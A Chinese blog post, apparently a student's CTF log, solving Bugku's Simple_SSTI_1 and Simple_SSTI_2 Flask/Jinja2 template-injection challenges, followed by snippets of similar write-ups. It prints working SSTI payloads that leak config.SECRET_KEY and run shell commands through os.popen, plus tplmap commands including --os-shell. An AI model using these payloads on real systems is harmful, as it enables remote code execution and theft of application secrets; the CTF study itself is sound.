寒假不摆烂-Bugku 刷题记录 2022.1.18 第一天 Simple_SSTI_1 Simple_SSTI_2 手工+ tqlmap使用(模板注入神器)

已于 2022-01-28 13:25:44 修改
阅读量3.4k 收藏 9
点赞数 3
分类专栏: CTF -WEB 学习 文章标签: 安全 web安全 flask
于 2022-01-18 23:52:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/AAAAAAAAAAAA66/article/details/122571152
版权

本文章仅作记录用,写的不会很详细,但是如果大家哪里不会可以评论或者私信,互相交流再说一句,本人很菜,共同进步。

这里推荐2个较经典的模板注入例子,漏洞(有tplmap的下载教程)+一道经典的CTF题目

【WEB攻防】Flask(Jinja2) 服务端模板注入漏洞 原理+防御_AAAAAAAAAAAA66的博客-CSDN博客
i春秋 afr3 任意文件读取 SSTI flask模板注入 session伪造 详细题解_AAAAAAAAAAAA66的博客-CSDN博客
 

目录

1. Simple_SSTI_1

2.Simple_SSTI_2

脚本小子 tplmap一把梭

 总结

1. Simple_SSTI_1

题目明显的模板注入,模板注入之前做过一道,但还是没啥经验。。。

首页显示一句英文 意思是要传一个flag的参数 F12 查看源码 提示secret_key文件

看完大佬的write up发现直接输入 config.secret_key即可 (但这里需要大写)

这里估计是考对模板注入下各配置文件的熟悉

 

最终payload

?flag={{config_SECRET_KEY}}

得到flag

2.Simple_SSTI_2

进去发现还是得去传参,但是按F12没有任何提示,所以联想到命令执行,因为之前就做过类似的一道命令执行,xjb 执行个ls ,发现不行,报错了(还是对模板注入没有深入的认识),不头铁,看大佬的write up,发现命令执行调用的函数和我的有点不同(得学学了。。)

报错

 正确解法

?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../%27).read()%20}}

命令执行ls %20是空格 %27是/ URL编码问题不多叙述了

 一个一个文件打开来找呗。。。(其实打开第一个app文件就找到了)

?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../app%27).read()%20}}

 打开app文件下的flag文件,最终得到flag

?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27cat%20../app/flag%27).read()%20}}

脚本小子 tplmap一把梭

这个部分是我发布博客之后发的,因为整理我原来对模板注入的学习,想到能不能用模板注入工具来解决这种简单的题目,后面尝试一下发现是可以的,就给大家看看。

拿第二题为例子

python tplmap.py -u http://114.67.175.224:11793/?flag

没错 就是我做过的 python flask框架模板注入。

获取命令执行权限

python tplmap.py --os-shell -u http://114.67.175.224:11793/?flag

简单的linux 语句得到flag 

 总结

很简单的python flask 模板注入题目,但是考察的是对config文件的理解,但其实对于我自己来说,如果不看之前的write up 其实做不出来,需要对flask框架有着更深的认识,但这显然是我缺少的,以后得花时间多了解一下。

寒假不摆烂

AAAAAAAAAAAA66
关注
  • 3
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
全国大学生信息安全竞赛决赛web4,SSTI+TensorFlow模型.zip
08-20
全国大学生信息安全竞赛决赛web4,SSTI+TensorFlow模型.zip 全国大学生信息安全竞赛决赛web4,SSTI+TensorFlow模型.zip 全国大学生信息安全竞赛决赛web4,SSTI+TensorFlow模型.zip 全国大学生信息安全竞赛决赛web4,SSTI+TensorFlow模型.zip 全国大学生信息安全竞赛决赛web4,SSTI+TensorFlow模型.zip
详解Python的Flask框架中生成SECRET_KEY密钥的方法
12-24
引子 如果遇到了 Must provide secret_key to use csrf错误提醒,原因就是没有设置secret_key ,在代码中加上 app.config[‘SECRET_KEY‘]=‘xxx‘ SECRET_KEY最好不要写在代码中。 最好设置一个config.py文件,从中读取该内容 config.py CSRF_ENABLED = True SECRET_KEY = ‘you-will-never-guess‘ app.py app.config.from_object(‘config‘) 这样就可以防止csrf了。 嗯,接下来我们就来说说这个SECR
BugKu-Simple_SSTI_1
gaily123的博客
07-03 273
场景界面为提示,需要flag参数 postman,get请求带参数flag={{config.SECRET_KEY}}
SSTImap: 革新的邮件处理库,为开发者打造高效解决方案
最新发布
gitblog_00055的博客
04-26 408
SSTImap: 革新的邮件处理库,为开发者打造高效解决方案 项目地址:https://gitcode.com/vladko312/SSTImap SSTImap 是一个由 Python 编写的高效、易用的 IMAP 客户端库,它允许开发人员轻松地与任何支持 IMAP 协议的邮件服务器进行交互。该项目旨在简化邮件应用的开发流程,提供强大而灵活的功能,让您的邮件管理项目更加得心应手。 技术分析 S...
BUGKU_Simple_SSTI_1
y17861077326的博客
06-05 779
查看网页源代码,发现提示: 与flask框架的 secret_key有关。 这个是模板注入的题,所以可以猜测思路是利用模板注入漏洞将secret_key变量的值回显到页面上。 如果没有才有猜到,那就利用payload先执行个ls命令看看根目录下有什么。 具体利用什么样的payload和为什么利用它见我的另一篇模板注入相关的笔记。 发现有这些文件 然后查看app文件夹里有什么 发现有app.py 有可能是源代码。 所以利用漏洞执行cat命令查看内容 根据红线,我们也可以知道,要想获取flag,就得获取 .
BugkuSimple_SSTI_1
addlys的博客
03-08 386
根据题目的提示,flag很有可能在SECRET_KEY文件中,我一直卡在看不了SECRET_KEY文件,知道看大佬wp,才知道是config.SECRET_KEY格式
[bugku]Simple_SSTI_1
ZhShy
03-10 316
题目: 进入页面先按F12 有个提示secret_key 考虑模板注入 输入url: http://114.67.175.224:10472/?flag={{config}} 直接找到了flag 如果访问 http://114.67.175.224:10472/?flag={{config.SECRET_KEY}} 可以直接显示flag
Bugku题目Simple_SSTI_1
zlloveyouforever的博客
06-19 677
/?flag={{config.SECRET_KEY}}
SSTI漏洞学习(下)——Flask_Jinja模板引擎的相关绕过 .pdf
09-05
SSTI漏洞学习(下)——Flask_Jinja模板引擎的相关绕过 安全人才 威胁情报 安全建设 安全开发 解决方案
十八、bugku Simple_SSTI_1
山兔的博客
09-06 531
ssti主要为python的一些框架 jinja2 mako tornado django,PHP框架smarty twig,java框架jade velocity等等使用了渲染函数时,由于代码不规范或信任了用户输入而导致了服务端模板注入模板渲染其实并没有漏洞,主要是程序员对代码不规范不严谨造成了模板注入漏洞,造成模板可控。 http://114.67.246.176:10828/?flag={{config}} ?flag={{config.SECRET_KEY}} {{}}是变量包裹标识符。{{}
BugkuSimple_SSTI_1(小宇特详解)
小宇的web博客
06-17 2484
BugkuSimple_SSTI_1 1.很简单的模板注入,直接f12查看(这里有查看源码的快捷键ctrl+u) 2.这里了解了一下什么是模板注入 这里针对的是flask模板,config是flask模板中的一个全局对象。包含了所有应用程序的配置值。 这里直接在url中写上?flag={{config.SECRET_KEY}} ...
BugKuSimple_SSTISSTI模板注入
热门推荐
m0_54082441的博客
05-01 1万+
1.签到题 这个题相当easy了,只要按照描述来做,便能得到flag,答案如下: flag{BugKu-Sec-pwn!} 2.Simple_SSTI_1(SSTI模板注入) 点击链接进入,题目说: You need pass in a parameter named flag。(你需要传入一个名为flag的参数)然后我们可以直接f12查看,也可以右击页面--->“检查” 如图所示,我们会得到相关的提示,根据提示信息,我们利用flask模板注入,就能直接得到flag。
BugKu 刷题笔记】【Simple_SSTI_1】
一个程序员
02-20 1435
文章目录0x01 题目0x02 题解0x03 知识点1. flask 与 secret_key2. 模板注入 0x01 题目 0x02 题解 输入url为: http://114.67.175.224:19636/?flag={{config.SECRET_KEY}} 即可得到flag 0x03 知识点 初学者, 在网上搜解题思路很容易可以找到。 但是不知其所以然所以整理一下知识点: 包含以下知识点: 1. flask 与 secret_key flask是一个轻量级的可定制框架,使用Python语言
bugku Simple_SSTI_1and 2(SSTI模板注入)
weixin_52182264的博客
05-10 595
1.Simple_SSTI_12.Simple_SSTI_2 输入:http://114.67.175.224:15355/?flag={%%20for%20c%20in%20[].class.base.subclasses()%20%}{%%20if%20c.name%27catch_warnings%27%20%}{{%20c.init.globals[%27__builtins__%27].eval(%22__import__(%27os%27).popen(%27ls%20/app/%27).rea
Bugku Simple_SSTI_2
qq_52718293的博客
10-23 2465
首先打开之后是上面这样,题目有提示是ssti,所以
bugku-web-Simple_SSTI_1
qq_51775369的博客
10-30 2974
.打开题目链接, 出现以下页面 提示需要传入一个名为flag的参数,题目又叫SSTI,从而得到了可以使用模板注入的基本条件 SSTI模板注入知识点:https://www.cnblogs.com/bmjoker/p/13508538.html 了解Jinjan2 基础语法 Jinja2模版语言,是不区分缩进的,和纯python不同。实际上所有模版语言都不区分缩紧。 常用标记: 注释:`{# 这是注释 #}` 变量:`{{ post.title }}`,或字典元素`{{your_d...
BugKuSimple_SSTI_1WEB详细解析
weixin_52219258的博客
01-13 1123
Simple_SSTI_1解析
Bugku CTF-Web篇writeup Simple_SSTI_1-2
anlr2020的博客
07-13 3202
Simple_SSTI_1 根据题目名得知为 简单_服务器模板注入 打开服务器场景英文提示,“你需要传入一个名为flag的参数”,得到参数名为flag F12或Ctrl+U查看一下网页代码 “你知道,在flask框架中,我们通常设置一个SECRET_KEY变量” flask:是由python实现的一种微web框架 SECRET_KEY:flask中的一种配置属性,flask涉及安全的东西需要用这个SECRET_KEY密钥进行加密 基本上根据提示可以确定题目的flag就藏在SECR..
[SSTI自动化工具]TPLMap安装&使用说明
m0_61155226的博客
07-11 1170
d DATA, --data=.. 通过POST发送的数据字符串 它必须作为查询字符串: param1=value1¶m2=value2。-c COOKIES, --co.. Cookies (e.g. 'Field1=Value1') 多次使用以添加新的Cookie。-H HEADERS, --he.. 附加标头 (e.g. 'Header1: Value1') 多次使用以添加新的标头。--bind-shell=BIN.. 在目标的TCP端口上生成系统Shell并连接到它。
bugku simple_ssti_1
03-16
simple_ssti_1 是一道来自 Bugku 的简单 Server-Side Template Injection(SSTI)漏洞题目。 SSTI 漏洞通常发生在使用模板引擎时,攻击者可以利用这种漏洞执行任意代码。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值